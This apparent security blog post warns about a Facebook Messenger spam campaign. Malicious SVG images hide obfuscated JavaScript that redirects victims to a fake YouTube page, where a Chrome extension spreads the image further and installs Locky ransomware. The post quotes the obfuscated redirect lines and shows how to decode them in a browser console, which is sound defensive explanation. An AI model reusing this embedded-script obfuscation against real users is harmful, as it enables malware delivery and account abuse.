Have you received any kind of image file through Facebook messages lately? If yes, is it in SVG format? If it is, please don’t click on it.
Spammers have crafted malicious images (SVG files) that will make you install ransomware on your system and, in turn, infect all of your friends through the same medium, i.e., Facebook messages.
Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, our logo is also in SVG format. You can download and inspect it by opening the file in a text editor.
The reason spammers choose to use SVG images for spam is that they allow dynamic content. Spammers had added malicious JavaScript code right inside the image itself, which in this case was a link to an external file that would, in turn, download Locky ransomware.
What would happen if you clicked on that spam image?
You can check out the SVG file code here:
http://pastebin.com/Ma5t0Fj0
If you look at the SVG file on Pastebin, observe lines 48 to 51
var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);
Spammers have cleverly used cryptographic techniques to bypass Facebook’s file checkers and then execute a window function.
If you log these variables in the console:
console.log(ljfji);
console.log(pryyb);
console.log(lpvxzt);
console.log(bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true));
You would get this:
top
location
href
Clearly, it appears that the malicious SVG file is attempting to redirect you to , which happens to be a fake YouTube video page that will force you to install a malicious Chrome extension.
When the extension gets installed, it will then take advantage of your browser’s access to your Facebook account to covertly spam your friends with the same SVG image file, helping this spam to spread more.
Furthermore, the extension also downloads Nemucod Downloader, which is a generic malware downloader generally used to fetch and install various ransomware. In this case, the malware downloader downloads Locky ransomware, leaving your system locked.
You can read more about ransomware in my previous post on Rise of malicious JavaScript.
Source: @peterkruse
Related posts:
- How to Find Out Who Made a Fake Facebook Account
- Facebook Profile Picture Viewer
- Getting IP Address from Facebook Messenger App
- Fake Facebook Account: How to Tell If a Facebook Profile Is Fake
- How to Track Location of Facebook User
- Get Facebook Hack Tool
- Facebook Phishing Email Examples
- How to Hack a Facebook Account
- Facebook: Invite All Your Friends to Like a Page